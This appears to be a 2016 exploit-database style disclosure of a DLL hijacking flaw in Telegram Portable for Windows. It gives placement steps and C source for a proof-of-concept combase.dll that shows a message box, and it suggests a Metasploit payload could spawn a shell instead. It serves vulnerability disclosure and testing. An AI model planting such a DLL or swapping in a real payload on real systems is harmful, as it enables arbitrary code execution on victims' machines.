# Exploit Title: Telegram Portable DLL Hijacking (combase.dll )
# Date: 29-8-2016
# Author: Ashiyane Digital Security Team
# Vendor Homepage: https://telegram.org/
# Software Link:
https://telegram.org/dl/desktop/win_portable
# Tested on: Windows 7
#######################################################################################
Vuln DLL: combase.dll
Telegram.exe will search for an load any DLL named "combase.dll".
If an attacker can place the DLL in a location
where victim open Telegram.exe it will load and run the attackers DLL
and code.
also can generate a msfpayload DLL and spawn a shell, for example.
#######################################################################################
Exploit :
1- Save and compile below C code as 'combase.dll' to create vuln DLL
2- Place 'combase.dll' on remote share or other directory like "downloads"
3- Open Telegram.exe :DLL
//gcc test.c -o combase.dll -shared
//this dll show a message box
#include <windows.h>
#define DllExport __declspec (dllexport)
BOOL WINAPI DllMain (
HANDLE hinstDLL,
DWORD fdwReason,
LPVOID lpvReserved)
{
dll_hijack();
return 0;
}
int dll_hijack()
{
MessageBox(0, "DLL Hijacking!", "DLL Message", MB_OK);
return 0;
}
#################
Discovered By : Amir.ght
#################